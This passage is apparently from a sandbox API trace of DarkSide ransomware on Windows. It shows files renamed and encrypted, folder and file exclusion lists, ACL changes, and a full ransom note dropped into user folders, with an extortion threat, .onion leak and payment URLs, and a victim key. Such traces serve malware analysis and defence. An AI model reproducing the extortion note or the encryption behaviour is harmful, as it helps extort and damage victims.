A9PsJ3IYh2i.pptx" [0149.824] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx") returned 0x45 [0149.824] wcscpy (in: _Dest=0x44e010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.824] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtn2pfb a9psj3iyh2i.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtn2pfb a9psj3iyh2i.pptx.c06622a1"), dwFlags=0x8) returned 1 [0149.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTN2PFb A9PsJ3IYh2i.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtn2pfb a9psj3iyh2i.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0149.826] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.826] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x56c0020 [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x640e510f [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33d40d1d [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32ab2458 [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x113367bf [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4b7d13c [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ce11716 [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ff7718c [0149.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x560a9ce7 [0149.837] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x56c0094, Length=0x80) returned 0x425090d [0149.837] RtlComputeCrc32 (PartialCrc=0x90d, Buffer=0x56c0094, Length=0x80) returned 0x3d28c178 [0149.837] RtlComputeCrc32 (PartialCrc=0xc178, Buffer=0x56c0094, Length=0x80) returned 0xcfcbf8a9 [0149.837] RtlComputeCrc32 (PartialCrc=0xf8a9, Buffer=0x56c0094, Length=0x80) returned 0xa02ad122 [0149.837] RtlComputeCrc32 (PartialCrc=0xd122, Buffer=0x56c0094, Length=0x80) returned 0xcd73d58f [0149.837] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x56c0020) returned 1 [0149.837] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0149.837] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0149.837] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.837] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0149.838] _wcsicmp (_Str1="backup", _Str2="Documents") returned -2 [0149.838] wcslen (_String="backup") returned 0x6 [0149.838] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0149.838] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0149.839] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0149.839] _wcsicmp (_Str1="$recycle.bin", _Str2="Downloads") returned -64 [0149.839] wcslen (_String="$recycle.bin") returned 0xc [0149.839] _wcsicmp (_Str1="config.msi", _Str2="Downloads") returned -1 [0149.839] wcslen (_String="config.msi") returned 0xa [0149.839] _wcsicmp (_Str1="$windows.~bt", _Str2="Downloads") returned -64 [0149.839] wcslen (_String="$windows.~bt") returned 0xc [0149.840] _wcsicmp (_Str1="$windows.~ws", _Str2="Downloads") returned -64 [0149.840] wcslen (_String="$windows.~ws") returned 0xc [0149.840] _wcsicmp (_Str1="windows", _Str2="Downloads") returned 19 [0149.840] wcslen (_String="windows") returned 0x7 [0149.840] _wcsicmp (_Str1="appdata", _Str2="Downloads") returned -3 [0149.840] wcslen (_String="appdata") returned 0x7 [0149.840] _wcsicmp (_Str1="application data", _Str2="Downloads") returned -3 [0149.840] wcslen (_String="application data") returned 0x10 [0149.840] _wcsicmp (_Str1="boot", _Str2="Downloads") returned -2 [0149.840] wcslen (_String="boot") returned 0x4 [0149.840] _wcsicmp (_Str1="google", _Str2="Downloads") returned 3 [0149.840] wcslen (_String="google") returned 0x6 [0149.840] _wcsicmp (_Str1="mozilla", _Str2="Downloads") returned 9 [0149.840] wcslen (_String="mozilla") returned 0x7 [0149.840] _wcsicmp (_Str1="program files", _Str2="Downloads") returned 12 [0149.840] wcslen (_String="program files") returned 0xd [0149.840] _wcsicmp (_Str1="program files (x86)", _Str2="Downloads") returned 12 [0149.840] wcslen (_String="program files (x86)") returned 0x13 [0149.840] _wcsicmp (_Str1="programdata", _Str2="Downloads") returned 12 [0149.840] wcslen (_String="programdata") returned 0xb [0149.840] _wcsicmp (_Str1="system volume information", _Str2="Downloads") returned 15 [0149.840] wcslen (_String="system volume information") returned 0x19 [0149.840] _wcsicmp (_Str1="tor browser", _Str2="Downloads") returned 16 [0149.840] wcslen (_String="tor browser") returned 0xb [0149.840] _wcsicmp (_Str1="windows.old", _Str2="Downloads") returned 19 [0149.841] wcslen (_String="windows.old") returned 0xb [0149.841] _wcsicmp (_Str1="intel", _Str2="Downloads") returned 5 [0149.841] wcslen (_String="intel") returned 0x5 [0149.841] _wcsicmp (_Str1="msocache", _Str2="Downloads") returned 9 [0149.841] wcslen (_String="msocache") returned 0x8 [0149.841] _wcsicmp (_Str1="perflogs", _Str2="Downloads") returned 12 [0149.841] wcslen (_String="perflogs") returned 0x8 [0149.841] _wcsicmp (_Str1="x64dbg", _Str2="Downloads") returned 20 [0149.841] wcslen (_String="x64dbg") returned 0x6 [0149.841] _wcsicmp (_Str1="public", _Str2="Downloads") returned 12 [0149.841] wcslen (_String="public") returned 0x6 [0149.841] _wcsicmp (_Str1="all users", _Str2="Downloads") returned -3 [0149.841] wcslen (_String="all users") returned 0x9 [0149.841] _wcsicmp (_Str1="default", _Str2="Downloads") returned -10 [0149.841] wcslen (_String="default") returned 0x7 [0149.841] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0149.841] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0149.841] wcscpy (in: _Dest=0x4480094, _Source="Downloads" | out: _Dest="Downloads") returned="Downloads" [0149.841] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0149.842] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0149.843] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0149.843] GetNamedSecurityInfoW () returned 0x0 [0149.844] SetEntriesInAclW () returned 0x0 [0149.844] SetNamedSecurityInfoW () returned 0x0 [0149.845] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57978) returned 1 [0149.845] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.845] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads")) returned 1 [0149.845] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.845] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.846] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.847] CloseHandle (hObject=0x1c) returned 1 [0149.847] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads")) returned 0x11 [0149.847] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="" [0149.847] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 0x2c [0149.847] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0149.847] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd7edfdc0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7edfdc0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.848] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0149.848] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0149.848] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0149.848] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0149.848] wcslen (_String="autorun.inf") returned 0xb [0149.848] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0149.849] wcslen (_String="boot.ini") returned 0x8 [0149.849] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0149.849] wcslen (_String="bootfont.bin") returned 0xc [0149.849] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0149.849] wcslen (_String="bootsect.bak") returned 0xc [0149.849] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0149.849] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7edfdc0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd7edfdc0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7edfdc0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0149.849] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0149.849] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.849] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0149.849] _wcsicmp (_Str1="backup", _Str2="Downloads") returned -2 [0149.849] wcslen (_String="backup") returned 0x6 [0149.849] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0149.849] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0149.850] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0149.850] _wcsicmp (_Str1="$recycle.bin", _Str2="Favorites") returned -66 [0149.850] wcslen (_String="$recycle.bin") returned 0xc [0149.850] _wcsicmp (_Str1="config.msi", _Str2="Favorites") returned -3 [0149.850] wcslen (_String="config.msi") returned 0xa [0149.850] _wcsicmp (_Str1="$windows.~bt", _Str2="Favorites") returned -66 [0149.850] wcslen (_String="$windows.~bt") returned 0xc [0149.850] _wcsicmp (_Str1="$windows.~ws", _Str2="Favorites") returned -66 [0149.850] wcslen (_String="$windows.~ws") returned 0xc [0149.850] _wcsicmp (_Str1="windows", _Str2="Favorites") returned 17 [0149.850] wcslen (_String="windows") returned 0x7 [0149.850] _wcsicmp (_Str1="appdata", _Str2="Favorites") returned -5 [0149.850] wcslen (_String="appdata") returned 0x7 [0149.850] _wcsicmp (_Str1="application data", _Str2="Favorites") returned -5 [0149.850] wcslen (_String="application data") returned 0x10 [0149.850] _wcsicmp (_Str1="boot", _Str2="Favorites") returned -4 [0149.850] wcslen (_String="boot") returned 0x4 [0149.850] _wcsicmp (_Str1="google", _Str2="Favorites") returned 1 [0149.850] wcslen (_String="google") returned 0x6 [0149.851] _wcsicmp (_Str1="mozilla", _Str2="Favorites") returned 7 [0149.851] wcslen (_String="mozilla") returned 0x7 [0149.851] _wcsicmp (_Str1="program files", _Str2="Favorites") returned 10 [0149.851] wcslen (_String="program files") returned 0xd [0149.851] _wcsicmp (_Str1="program files (x86)", _Str2="Favorites") returned 10 [0149.851] wcslen (_String="program files (x86)") returned 0x13 [0149.851] _wcsicmp (_Str1="programdata", _Str2="Favorites") returned 10 [0149.851] wcslen (_String="programdata") returned 0xb [0149.851] _wcsicmp (_Str1="system volume information", _Str2="Favorites") returned 13 [0149.851] wcslen (_String="system volume information") returned 0x19 [0149.851] _wcsicmp (_Str1="tor browser", _Str2="Favorites") returned 14 [0149.851] wcslen (_String="tor browser") returned 0xb [0149.851] _wcsicmp (_Str1="windows.old", _Str2="Favorites") returned 17 [0149.851] wcslen (_String="windows.old") returned 0xb [0149.851] _wcsicmp (_Str1="intel", _Str2="Favorites") returned 3 [0149.851] wcslen (_String="intel") returned 0x5 [0149.851] _wcsicmp (_Str1="msocache", _Str2="Favorites") returned 7 [0149.851] wcslen (_String="msocache") returned 0x8 [0149.851] _wcsicmp (_Str1="perflogs", _Str2="Favorites") returned 10 [0149.851] wcslen (_String="perflogs") returned 0x8 [0149.851] _wcsicmp (_Str1="x64dbg", _Str2="Favorites") returned 18 [0149.851] wcslen (_String="x64dbg") returned 0x6 [0149.851] _wcsicmp (_Str1="public", _Str2="Favorites") returned 10 [0149.851] wcslen (_String="public") returned 0x6 [0149.851] _wcsicmp (_Str1="all users", _Str2="Favorites") returned -5 [0149.851] wcslen (_String="all users") returned 0x9 [0149.852] _wcsicmp (_Str1="default", _Str2="Favorites") returned -2 [0149.852] wcslen (_String="default") returned 0x7 [0149.852] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0149.852] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0149.852] wcscpy (in: _Dest=0x4480094, _Source="Favorites" | out: _Dest="Favorites") returned="Favorites" [0149.852] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0149.852] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0149.852] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0149.852] GetNamedSecurityInfoW () returned 0x0 [0149.852] SetEntriesInAclW () returned 0x0 [0149.852] SetNamedSecurityInfoW () returned 0x0 [0149.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57a18) returned 1 [0149.918] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.918] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites")) returned 1 [0149.918] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.918] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.919] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.920] CloseHandle (hObject=0x1c) returned 1 [0149.920] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites")) returned 0x11 [0149.920] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="" [0149.920] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 0x2c [0149.920] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0149.921] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd7f9e4a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7f9e4a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.921] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0149.921] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0149.921] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0149.921] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0149.921] wcslen (_String="autorun.inf") returned 0xb [0149.921] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0149.921] wcslen (_String="boot.ini") returned 0x8 